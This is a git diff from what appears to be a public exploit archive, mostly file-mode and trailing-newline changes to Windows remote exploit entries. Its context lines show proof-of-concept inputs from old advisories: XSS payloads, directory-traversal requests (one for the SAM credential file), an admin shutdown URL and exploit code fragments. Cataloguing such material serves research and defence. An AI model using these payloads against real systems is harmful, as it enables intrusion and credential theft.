old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21385.txt b/platforms/windows/remote/21385.txt old mode 100755 new mode 100644 index 32cf4bc1a..d23c13bfd --- a/platforms/windows/remote/21385.txt +++ b/platforms/windows/remote/21385.txt @@ -16,4 +16,4 @@ Response: Microsoft VBScript runtime (0x800A004C) Path not found Request: http://target/IISSamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/oracle/nonexistant.asp -Response: Microsoft VBScript runtime (0x800A0035) File not found \ No newline at end of file +Response: Microsoft VBScript runtime (0x800A0035) File not found \ No newline at end of file diff --git a/platforms/windows/remote/21386.html b/platforms/windows/remote/21386.html old mode 100755 new mode 100644 index 2ce2a093e..395cebff3 --- a/platforms/windows/remote/21386.html +++ b/platforms/windows/remote/21386.html @@ -15,4 +15,4 @@ ID="1"></BODY></HTML><BINARY><DATA ID=1">***WAVE FILE DATA HERE***</DATA></BINARY> -However, injection into the AIM communication stream may require additional work as the protocol includes some overhead such as sequence numbers for messages. \ No newline at end of file +However, injection into the AIM communication stream may require additional work as the protocol includes some overhead such as sequence numbers for messages. \ No newline at end of file diff --git a/platforms/windows/remote/2140.pm b/platforms/windows/remote/2140.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21438.txt b/platforms/windows/remote/21438.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21439.txt b/platforms/windows/remote/21439.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21446.txt b/platforms/windows/remote/21446.txt old mode 100755 new mode 100644 index 7ca0b0e87..602714a3c --- a/platforms/windows/remote/21446.txt +++ b/platforms/windows/remote/21446.txt @@ -6,4 +6,4 @@ Script code is not filtered from URL parameters that are used as output by the S This may enable the attacker to steal cookie-based authentication credentials from legitimate users. -http://target/sgdynamo.exe?HTNAME=<script>alert("test")</script> \ No newline at end of file +http://target/sgdynamo.exe?HTNAME=<script>alert("test")</script> \ No newline at end of file diff --git a/platforms/windows/remote/21451.txt b/platforms/windows/remote/21451.txt old mode 100755 new mode 100644 index d66fcb6eb..2e92f1847 --- a/platforms/windows/remote/21451.txt +++ b/platforms/windows/remote/21451.txt @@ -5,4 +5,4 @@ Opera is a web browser product created by Opera Software, and is available for a It is possible to bypass the same origin policy in some versions of the Opera Browser. Javascript may modify the location property of an IFRAME or FRAME included in the document. If the location is set to a javascript: URL, the script code will execute within the context of the previous frame site. <iframe name=foo src="www.sensitive.com"></iframe> -<script>foo.location="javascript:alert(document.cookie)";</script> \ No newline at end of file +<script>foo.location="javascript:alert(document.cookie)";</script> \ No newline at end of file diff --git a/platforms/windows/remote/21452.txt b/platforms/windows/remote/21452.txt old mode 100755 new mode 100644 index a632e9723..52fd9fa6d --- a/platforms/windows/remote/21452.txt +++ b/platforms/windows/remote/21452.txt @@ -10,4 +10,4 @@ This vulnerability may also be exploited through HTML formatted email. This vulnerability could potentially be exploited by an HTTP header similar to the following: Content-Type: audio/x-ms-wma -Content-disposition: inline; filename="foo.exe" \ No newline at end of file +Content-disposition: inline; filename="foo.exe" \ No newline at end of file diff --git a/platforms/windows/remote/21466.c b/platforms/windows/remote/21466.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21467.c b/platforms/windows/remote/21467.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21469.txt b/platforms/windows/remote/21469.txt old mode 100755 new mode 100644 index cec926b96..17aa5e983 --- a/platforms/windows/remote/21469.txt +++ b/platforms/windows/remote/21469.txt @@ -6,4 +6,4 @@ ServletExec/ISAPI discloses the absolute path to the webroot directory when sent This type of sensitive information may aid in further attacks against the host running the vulnerable software. -http://target/servlet/com.newatlanta.servletexec.JSP10Servlet/ \ No newline at end of file +http://target/servlet/com.newatlanta.servletexec.JSP10Servlet/ \ No newline at end of file diff --git a/platforms/windows/remote/21470.txt b/platforms/windows/remote/21470.txt old mode 100755 new mode 100644 index 6fef1b57c..b0a3e65a3 --- a/platforms/windows/remote/21470.txt +++ b/platforms/windows/remote/21470.txt @@ -4,4 +4,4 @@ ServletExec/ISAPI is a plug-in Java Servlet/JSP engine for Microsoft IIS. It run ServletExec/ISAPI will disclose the contents of arbitrary files within the webroot directory by sending a request containing URL encoded directory traversal sequences. While this will cause the software to serve files within wwwroot that normally would not be served, it does not appear possible to exploit this condition to break out of the webroot. -http://target/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5c\global.asa \ No newline at end of file +http://target/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5c\global.asa \ No newline at end of file diff --git a/platforms/windows/remote/21475.txt b/platforms/windows/remote/21475.txt old mode 100755 new mode 100644 index 542e63c84..dea32ac8e --- a/platforms/windows/remote/21475.txt +++ b/platforms/windows/remote/21475.txt @@ -4,4 +4,4 @@ A vulnerability exists in LocalWEB2000 related to content password protection. I This vulnerability was reported for LocalWEB2000 Standard Version 2.1.0. Other versions (such as the Professional Edition) may also be affected by this issue. -http://target/./protectedfolder/protectedfile.htm \ No newline at end of file +http://target/./protectedfolder/protectedfile.htm \ No newline at end of file diff --git a/platforms/windows/remote/21483.html b/platforms/windows/remote/21483.html old mode 100755 new mode 100644 index 55a635947..23622b30f --- a/platforms/windows/remote/21483.html +++ b/platforms/windows/remote/21483.html @@ -10,4 +10,4 @@ name="secForm"> <input type="file" name="expFile" value="c:\test.txt&#10;" style="visibility:hidden"> </form> -</body> \ No newline at end of file +</body> \ No newline at end of file diff --git a/platforms/windows/remote/21484.c b/platforms/windows/remote/21484.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21485.txt b/platforms/windows/remote/21485.txt old mode 100755 new mode 100644 index 4b7d83bc3..d5793d428 --- a/platforms/windows/remote/21485.txt +++ b/platforms/windows/remote/21485.txt @@ -22,4 +22,4 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP PPPQQQQRRRRSSSSTTTAAAA&#11;©õwABCDEFGH^Ð&#402;Ã?&#21;^?ægMyWindow"><PARAM NAME="Item2" VALUE="NGS Software LTD"></OBJECT> -<SCRIPT>winhelp.HHClick()</SCRIPT> \ No newline at end of file +<SCRIPT>winhelp.HHClick()</SCRIPT> \ No newline at end of file diff --git a/platforms/windows/remote/21515.txt b/platforms/windows/remote/21515.txt old mode 100755 new mode 100644 index 88b37ffd2..2cc5d7384 --- a/platforms/windows/remote/21515.txt +++ b/platforms/windows/remote/21515.txt @@ -8,4 +8,4 @@ When a folder is being viewed through FTP, the FTP server name is included in th This vulnerability has been confirmed to exist under Windows 2000. Other versions of Windows may share this vulnerability. This has not, however, been confirmed. -<a href="ftp://%22%3e%3cscript%3ealert(%22Exploit%22)%3b%3c%2fscript%3e%20" target="_blank">Exploit</a> \ No newline at end of file +<a href="ftp://%22%3e%3cscript%3ealert(%22Exploit%22)%3b%3c%2fscript%3e%20" target="_blank">Exploit</a> \ No newline at end of file diff --git a/platforms/windows/remote/21530.txt b/platforms/windows/remote/21530.txt old mode 100755 new mode 100644 index b9bc577f9..a627d903f --- a/platforms/windows/remote/21530.txt +++ b/platforms/windows/remote/21530.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/4978/info The Seanox DevWex Windows binary version is prone to an issue which may cause arbitrary web-readable files to be disclosed to remote attackers. This problem occurs because DevWex does not sufficiently filter '..\' sequences from web requests. -GET /..\..\..\..\anyfile \ No newline at end of file +GET /..\..\..\..\anyfile \ No newline at end of file diff --git a/platforms/windows/remote/21541.txt b/platforms/windows/remote/21541.txt old mode 100755 new mode 100644 index b2747d094..193303f7c --- a/platforms/windows/remote/21541.txt +++ b/platforms/windows/remote/21541.txt @@ -7,4 +7,4 @@ It is possible, under some circumstances, to inject arbitrary script code via XM It should be noted that successful exploitation of this vulnerability is highly conditional. Firstly, the victim of the attack must have access to an IIS server running vulnerable versions of the SQLXML HTTP components. The victim of the attack must also have sufficient privileges to pass queries to the underlying SQL server. Lastly, the attacker must also have knowledge of the virtual directory that has been set up on the IIS Server for SQLXML HTTP components. IIS-server/Northwind?sql=SELECT+contactname,+phone+FROM+Customers+FOR+XML&root= -<SCRIPT>alert(document.domain)</SCRIPT> \ No newline at end of file +<SCRIPT>alert(document.domain)</SCRIPT> \ No newline at end of file diff --git a/platforms/windows/remote/21542.c b/platforms/windows/remote/21542.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21554.txt b/platforms/windows/remote/21554.txt old mode 100755 new mode 100644 index c946c0213..e44da4d2b --- a/platforms/windows/remote/21554.txt +++ b/platforms/windows/remote/21554.txt @@ -6,4 +6,4 @@ It is possible for attackers to construct a URL that will cause scripting code t Xitami fails to check URLs for the presence of script commands when generating error pages returned from sample scripts that use Errors.gsl, allowing attacker supplied code to execute. As a result, when an innocent user follows such a link, the script code will execute within the context of the hosted site. -http://www.<IMG%20SRC=""%20ONERROR="alert(document.cookie)">.target.com/error404 \ No newline at end of file +http://www.<IMG%20SRC=""%20ONERROR="alert(document.cookie)">.target.com/error404 \ No newline at end of file diff --git a/platforms/windows/remote/21555.txt b/platforms/windows/remote/21555.txt old mode 100755 new mode 100644 index df00fccdb..a94f82573 --- a/platforms/windows/remote/21555.txt +++ b/platforms/windows/remote/21555.txt @@ -4,4 +4,4 @@ Cisco Secure ACS is an access control and accounting server system. It is distri It has been discovered that the web server component of the Cisco Secure ACS package allows an attacker to execute cross-site scripting attacks. When this link is visited, the attacker-supplied HTML or script code could be executed in the browser of a user, provided the user has authenticated to the Secure ACS server. -http://example.com:dyn_port/setup.exe?action=<script>alert('foo+bar')</script>&page=list_users&user=P* \ No newline at end of file +http://example.com:dyn_port/setup.exe?action=<script>alert('foo+bar')</script>&page=list_users&user=P* \ No newline at end of file diff --git a/platforms/windows/remote/21576.txt b/platforms/windows/remote/21576.txt old mode 100755 new mode 100644 index a11f4c377..1c0b00893 --- a/platforms/windows/remote/21576.txt +++ b/platforms/windows/remote/21576.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/5086/info BadBlue is a P2P file sharing application distributed by Working Resources. The ext.dll ISAPI does not sufficiently sanitize input. Because of this, it is possible for a user to create a custom URL containing script code that, when viewed in a browser by another user, will result in the execution of the script code. This could allow for the execution of malicious JavaScript in the context of a trusted site. -http://target/ext.dll?MfcISAPICommand=LoadPage&page=search.htx&a0=%3Cscript%3Ealert('lame')%3C/script%3E&a1=0&a2=1&a3=6 \ No newline at end of file +http://target/ext.dll?MfcISAPICommand=LoadPage&page=search.htx&a0=%3Cscript%3Ealert('lame')%3C/script%3E&a1=0&a2=1&a3=6 \ No newline at end of file diff --git a/platforms/windows/remote/21581.txt b/platforms/windows/remote/21581.txt old mode 100755 new mode 100644 index 66a3c488f..267c97526 --- a/platforms/windows/remote/21581.txt +++ b/platforms/windows/remote/21581.txt @@ -10,4 +10,4 @@ http://target/urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27xss%2 This will affect web users who visit the reports page: -http://target/urlcount.cgi?REPORT \ No newline at end of file +http://target/urlcount.cgi?REPORT \ No newline at end of file diff --git a/platforms/windows/remote/21582.txt b/platforms/windows/remote/21582.txt old mode 100755 new mode 100644 index df3e00ef9..a6104f036 --- a/platforms/windows/remote/21582.txt +++ b/platforms/windows/remote/21582.txt @@ -5,4 +5,4 @@ Macromedia JRun is prone to an issue which may allow remote attackers to bypass http://JRun-Server:8000//welcome.jsp?&action=stop&server=default will shutdown the 'default' JRun server instance on port 8100. Other -administrative functions can also be accessed. \ No newline at end of file +administrative functions can also be accessed. \ No newline at end of file diff --git a/platforms/windows/remote/21595.c b/platforms/windows/remote/21595.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21597.txt b/platforms/windows/remote/21597.txt old mode 100755 new mode 100644 index 5cfe546a4..266e7d834 --- a/platforms/windows/remote/21597.txt +++ b/platforms/windows/remote/21597.txt @@ -5,4 +5,4 @@ It has been reported that version 1.0.2 of KF Web Server discloses the contents If a remote attacker appends the "%00" character, it will cause the web server to display the contents of the current directory. http://server_name/subdir/%00 -http://server_name/%00 \ No newline at end of file +http://server_name/%00 \ No newline at end of file diff --git a/platforms/windows/remote/21599.txt b/platforms/windows/remote/21599.txt old mode 100755 new mode 100644 index 55319e9ec..a1db475f8 --- a/platforms/windows/remote/21599.txt +++ b/platforms/windows/remote/21599.txt @@ -8,4 +8,4 @@ Additionally, user supplied input is displayed as the hidden form value "a0" wit "hi"'));alert("ZING!!!");document.write(cleanSearchString('a -"><script>alert("ZING!!!");</script>< \ No newline at end of file +"><script>alert("ZING!!!");</script>< \ No newline at end of file diff --git a/platforms/windows/remote/21601.c b/platforms/windows/remote/21601.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21605.txt b/platforms/windows/remote/21605.txt old mode 100755 new mode 100644 index 3698a03c4..f955508e7 --- a/platforms/windows/remote/21605.txt +++ b/platforms/windows/remote/21605.txt @@ -4,4 +4,4 @@ A vulnerability has been reported for Apache Tomcat 4.0.3 on a Microsoft Windows When making a request for a DOS device file name, Tomcat will throw an exception and respond with an error message. It is also possible for information to be appended to the DOS device when making a request. -tomcat-server/COM2.IMG%20src= "Javascript:alert(document.domain)" \ No newline at end of file +tomcat-server/COM2.IMG%20src= "Javascript:alert(document.domain)" \ No newline at end of file diff --git a/platforms/windows/remote/21606.txt b/platforms/windows/remote/21606.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21607.txt b/platforms/windows/remote/21607.txt old mode 100755 new mode 100644 index 26059e92e..12c625de1 --- a/platforms/windows/remote/21607.txt +++ b/platforms/windows/remote/21607.txt @@ -8,4 +8,4 @@ It has been reported that it is possible to exploit this vulnerability to access ** It is also possible to connect directly to a GoAhead WebServer using netcat or telnet and issuing a GET command for a known file using regular directory traversal sequences. There is no requirement for encoding the '/' character as '%5C'. Instead an attacker can obtain files by using '..\..\' sequences. -GoAhead-server/..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini \ No newline at end of file +GoAhead-server/..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini \ No newline at end of file diff --git a/platforms/windows/remote/21608.txt b/platforms/windows/remote/21608.txt old mode 100755 new mode 100644 index d58ac4d03..ffb39708c --- a/platforms/windows/remote/21608.txt +++ b/platforms/windows/remote/21608.txt @@ -4,4 +4,4 @@ A vulnerability has been reported for GoAhead WebServer 2.1. Reportedly, it is p GoAhead WebServer includes unsanitized requested URLs when displaying a 404 error page. An attacker may be able to trick a user into following a link which includes malicious script code, and executing the attack. -GoAhead-server/SCRIPTalert(document.domain)/SCRIPT \ No newline at end of file +GoAhead-server/SCRIPTalert(document.domain)/SCRIPT \ No newline at end of file diff --git a/platforms/windows/remote/21611.txt b/platforms/windows/remote/21611.txt old mode 100755 new mode 100644 index 75cace987..cfda7d638 --- a/platforms/windows/remote/21611.txt +++ b/platforms/windows/remote/21611.txt @@ -4,4 +4,4 @@ Lil' HTTP server is a web server application for Windows environments and is mai It is possible for attackers to construct a URL to the 'pbcgi.cgi' script which includes scripting code to execute in a user's browser. As a result, when an innocent user follows such a link, the script code will execute within the context of the hosted site. -http://localhost:81/pbcgi.cgi?name=Matthew%20Murphy&email=%3CSCRIPT%3Ealert%28%27xss%27%29%3B%3C%2FSCRIPT%3E \ No newline at end of file +http://localhost:81/pbcgi.cgi?name=Matthew%20Murphy&email=%3CSCRIPT%3Ealert%28%27xss%27%29%3B%3C%2FSCRIPT%3E \ No newline at end of file diff --git a/platforms/windows/remote/21613.txt b/platforms/windows/remote/21613.txt old mode 100755 new mode 100644 index 8c52d053d..7ddfdfc83 --- a/platforms/windows/remote/21613.txt +++ b/platforms/windows/remote/21613.txt @@ -17,4 +17,4 @@ RCPT TO: IMCEASMTP-test+40test+2Ecom@victim.co.uk 250 2.1.5 IMCEASMTP-test+40test+2Ecom@victim.co.uk data 354 Start mail input; end with <CRLF>.<CRLF> -Subject: You are vulnerable. \ No newline at end of file +Subject: You are vulnerable. \ No newline at end of file diff --git a/platforms/windows/remote/21615.c b/platforms/windows/remote/21615.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21616.txt b/platforms/windows/remote/21616.txt old mode 100755 new mode 100644 index 679cb0e64..b600c3266 --- a/platforms/windows/remote/21616.txt +++ b/platforms/windows/remote/21616.txt @@ -4,4 +4,4 @@ BadBlue is a P2P file sharing application distributed by Working Resources. It i It has been discovered that a request passed to a BadBlue server containing a null byte at the end of a file name will return the contents of the file. This type of request can be applied to gain access to sensitive information, such as the BadBlue configuration file. -GET /ext.ini.% 00.txt HTTP/1.0 \ No newline at end of file +GET /ext.ini.% 00.txt HTTP/1.0 \ No newline at end of file diff --git a/platforms/windows/remote/21618.txt b/platforms/windows/remote/21618.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21619.txt b/platforms/windows/remote/21619.txt old mode 100755 new mode 100644 index 55727e379..2cf70cc25 --- a/platforms/windows/remote/21619.txt +++ b/platforms/windows/remote/21619.txt @@ -8,4 +8,4 @@ This issue was reported for versions of AIM running on Microsoft Windows and Mac <META HTTP-EQUIV="refresh"CONTENT=0;URL=aim:addbuddy?listofscreennames=mindfliporg,mfliporb,mflipmax,mflips0nic,mflipzorcon&groupname=mindfliporg> A web page loaded with the above code in the META REFRESH tag will -automatically add a group called mindfliporg and add the users mindfliporg, mfliporb, mflipmax, mflips0nic, mflipzorcon to buddy list. \ No newline at end of file +automatically add a group called mindfliporg and add the users mindfliporg, mfliporb, mflipmax, mflips0nic, mflipzorcon to buddy list. \ No newline at end of file diff --git a/platforms/windows/remote/2162.pm b/platforms/windows/remote/2162.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21626.c b/platforms/windows/remote/21626.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21630.html b/platforms/windows/remote/21630.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21631.txt b/platforms/windows/remote/21631.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21633.c b/platforms/windows/remote/21633.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21635.c b/platforms/windows/remote/21635.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21636.txt b/platforms/windows/remote/21636.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21639.c b/platforms/windows/remote/21639.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2164.pm b/platforms/windows/remote/2164.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21643.c b/platforms/windows/remote/21643.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21648.txt b/platforms/windows/remote/21648.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21650.txt b/platforms/windows/remote/21650.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21651.txt b/platforms/windows/remote/21651.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21652.cpp b/platforms/windows/remote/21652.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21654.c b/platforms/windows/remote/21654.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21662.txt b/platforms/windows/remote/21662.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21670.txt b/platforms/windows/remote/21670.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21681.html b/platforms/windows/remote/21681.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21692.txt b/platforms/windows/remote/21692.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21693.nasl b/platforms/windows/remote/21693.nasl old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21697.txt b/platforms/windows/remote/21697.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21698.txt b/platforms/windows/remote/21698.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21705.txt b/platforms/windows/remote/21705.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21707.txt b/platforms/windows/remote/21707.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21710.txt b/platforms/windows/remote/21710.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21711.html b/platforms/windows/remote/21711.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21717.txt b/platforms/windows/remote/21717.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21718.txt b/platforms/windows/remote/21718.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21719.txt b/platforms/windows/remote/21719.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21735.txt b/platforms/windows/remote/21735.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21748.txt b/platforms/windows/remote/21748.txt old mode 100755 new mode 100644 index 58fcf99f8..80327b199 --- a/platforms/windows/remote/21748.txt +++ b/platforms/windows/remote/21748.txt @@ -23,4 +23,4 @@ vspace=0 <PARAM NAME="FontSize" VALUE="50"> <PARAM NAME="FontBold" VALUE="1"> <PARAM NAME="FrColor" VALUE="0"> -</OBJECT> \ No newline at end of file +</OBJECT> \ No newline at end of file diff --git a/platforms/windows/remote/21749.txt b/platforms/windows/remote/21749.txt old mode 100755 new mode 100644 index eb0fb62f9..caa4414d6 --- a/platforms/windows/remote/21749.txt +++ b/platforms/windows/remote/21749.txt @@ -19,4 +19,4 @@ oXD.firstChild || oPE.line>0 ? "File does not exist or could not be retrieved." ); } -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/windows/remote/21750.txt b/platforms/windows/remote/21750.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21753.txt b/platforms/windows/remote/21753.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21754.txt b/platforms/windows/remote/21754.txt old mode 100755 new mode 100644 index 99a3563df..77ac2278b --- a/platforms/windows/remote/21754.txt +++ b/platforms/windows/remote/21754.txt @@ -4,4 +4,4 @@ Cross site scripting vulnerabilities have been reported in multiple sample scrip This type of vulnerability may be used to steal cookies or perform other web-based attacks. -http://localhost/test.shtml?%3CSCRIPT%3Ealert(document.URL)%3C%2FSCRIPT%3E=x \ No newline at end of file +http://localhost/test.shtml?%3CSCRIPT%3Ealert(document.URL)%3C%2FSCRIPT%3E=x \ No newline at end of file diff --git a/platforms/windows/remote/21757.txt b/platforms/windows/remote/21757.txt old mode 100755 new mode 100644 index 5aa6335da..e159ec89b --- a/platforms/windows/remote/21757.txt +++ b/platforms/windows/remote/21757.txt @@ -5,4 +5,4 @@ OmniHTTPD is a webserver for Microsoft Windows operating systems. OmniHTTPD supp A HTML injection vulnerability has been reported in the '/cgi-bin/redir.exe' sample CGI included with OmniHTTPD. Reportedly, it is possible for an attacker to URL encode the newline character (%0D) and insert malicious HTML code. A vulnerable server receiving a malformed request will return a 302 redirect HTTP response containing the malicious attacker-supplied code. http://localhost/cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Eyahoo%2Ecom%2F%0D% -0A%0D%0A%3CSCRIPT%3Ealert%28document%2EURL%29%3C%2FSCRIPT%3E \ No newline at end of file +0A%0D%0A%3CSCRIPT%3Ealert%28document%2EURL%29%3C%2FSCRIPT%3E \ No newline at end of file diff --git a/platforms/windows/remote/21759.txt b/platforms/windows/remote/21759.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21764.txt b/platforms/windows/remote/21764.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21777.txt b/platforms/windows/remote/21777.txt old mode 100755 new mode 100644 index eea476542..6f9f4c6f9 --- a/platforms/windows/remote/21777.txt +++ b/platforms/windows/remote/21777.txt @@ -15,4 +15,4 @@ e)";         7000     ); } -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/windows/remote/21794.txt b/platforms/windows/remote/21794.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21803.txt b/platforms/windows/remote/21803.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21804.c b/platforms/windows/remote/21804.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21808.txt b/platforms/windows/remote/21808.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21810.c b/platforms/windows/remote/21810.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21812.txt b/platforms/windows/remote/21812.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21883.html b/platforms/windows/remote/21883.html old mode 100755 new mode 100644 index 3f82bd5bf..8e56e396d --- a/platforms/windows/remote/21883.html +++ b/platforms/windows/remote/21883.html @@ -69,4 +69,4 @@ close(); } </script> </BODY> -</HTML> \ No newline at end of file +</HTML> \ No newline at end of file diff --git a/platforms/windows/remote/21897.txt b/platforms/windows/remote/21897.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21898.txt b/platforms/windows/remote/21898.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21902.c b/platforms/windows/remote/21902.c old mode 100755 new mode 100644 index 7feeb8f04..816f6a565 --- a/platforms/windows/remote/21902.c +++ b/platforms/windows/remote/21902.c @@ -132,5 +132,4 @@ int main(int argc, char ** argv) *(int*)pCode = addr ? addr : 0x77e79d02; *(pCode+4)=0; printf("%s%s%s",prefix,buff,postfix); -} - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/remote/21910.txt b/platforms/windows/remote/21910.txt old mode 100755 new mode 100644 index e8a94489a..a9e6f1a15 --- a/platforms/windows/remote/21910.txt +++ b/platforms/windows/remote/21910.txt @@ -4,4 +4,4 @@ A vulnerability in Microsoft Internet Information Server (IIS) may make cross-si When IIS receives a request for an .idc file, the server typically returns a 404 message when the page does not exist. However, when a request containing a long URL and ending in the .idc extension is received by IIS, the entire contents of the URL are returned on the error page without the sanitizing of input. This could result in the execution of arbitrary script code. -http://www.example.com/<long_buffer><script_to_execute>.idc \ No newline at end of file +http://www.example.com/<long_buffer><script_to_execute>.idc \ No newline at end of file diff --git a/platforms/windows/remote/21913.txt b/platforms/windows/remote/21913.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21932.pl b/platforms/windows/remote/21932.pl index 97621733a..b12c5a9ec 100755 --- a/platforms/windows/remote/21932.pl +++ b/platforms/windows/remote/21932.pl @@ -204,4 +204,4 @@ sleep(1); print $sock "QUIT\r\n"; sleep(1); close($sock); -print "Disconnected\r\n"; \ No newline at end of file +print "Disconnected\r\n"; \ No newline at end of file diff --git a/platforms/windows/remote/21940.txt b/platforms/windows/remote/21940.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/21955.java b/platforms/windows/remote/21955.java old mode 100755 new mode 100644 index 70bb14066..a41ccf157 --- a/platforms/windows/remote/21955.java +++ b/platforms/windows/remote/21955.java @@ -105,4 +105,4 @@ os.write( egg ); os.write( (byte)0x00 ); } //---------------------------------------------------------------------------- -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/remote/21958.txt b/platforms/windows/remote/21958.txt old mode 100755 new mode 100644 index 004fb7685..38f04c89c --- a/platforms/windows/remote/21958.txt +++ b/platforms/windows/remote/21958.txt @@ -6,4 +6,4 @@ To exploit this issue, the attacker must know the exact location of the file to Versions other than AOL Instant Messenger 4.8.2790 do not seem to be affected by this vulnerability. The vulnerability was reported for Microsoft Windows versions of the client. -<a href ="../../../../progra~1/trojan/trojan.exe">www.example.com</a> \ No newline at end of file +<a href ="../../../../progra~1/trojan/trojan.exe">www.example.com</a> \ No newline at end of file diff --git a/platforms/windows/remote/21959.txt b/platforms/windows/remote/21959.txt old mode 100755 new mode 100644 index 21cb3d95a..d73821217 --- a/platforms/windows/remote/21959.txt +++ b/platforms/windows/remote/21959.txt @@ -22,4 +22,4 @@ function () { }, 3000 ); -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/windows/remote/21964.txt b/platforms/windows/remote/21964.txt old mode 100755 new mode 100644 index 1358694fa..5c417b1e9 --- a/platforms/windows/remote/21964.txt +++ b/platforms/windows/remote/21964.txt @@ -4,4 +4,4 @@ SolarWinds TFTP Server is distributed for the Microsoft Windows platform. The SolarWinds TFTP Server does not properly handle user-supplied input. Due to insufficient handling of user input, it is possible for a remote user to request arbitrary files from the vulnerable server. It would be possible for a remote user to download any files readable through the permissions of the TFTP Server user. -tftp example.com GET a\..\..\winnt\repair\sam \ No newline at end of file +tftp example.com GET a\..\..\winnt\repair\sam \ No newline at end of file diff --git a/platforms/windows/remote/21997.txt b/platforms/windows/remote/21997.txt old mode 100755 new mode 100644 index 3e768e4d9..31a5215d7 --- a/platforms/windows/remote/21997.txt +++ b/platforms/windows/remote/21997.txt @@ -11,4 +11,4 @@ Attacks of this nature may make it possible for attackers to manipulate web cont This issue was reported in LiteServe v2.01. It is not yet known whether earlier versions are affected by this issue. -http://%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28location%2Ehref%29%22%3E.liteserve.net/dir \ No newline at end of file +http://%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28location%2Ehref%29%22%3E.liteserve.net/dir \ No newline at end of file diff --git a/platforms/windows/remote/21999.txt b/platforms/windows/remote/21999.txt old mode 100755 new mode 100644 index 3895f20e0..80584c603 --- a/platforms/windows/remote/21999.txt +++ b/platforms/windows/remote/21999.txt @@ -10,4 +10,4 @@ Attacks of this nature may make it possible for attackers to manipulate web cont http://liteserve.net/dir?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28location%2Ehref%29%22%3E -http://liteserve.net/dir?%3C%2FTITLE%3E%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28location%2Ehref%29%22%3E \ No newline at end of file 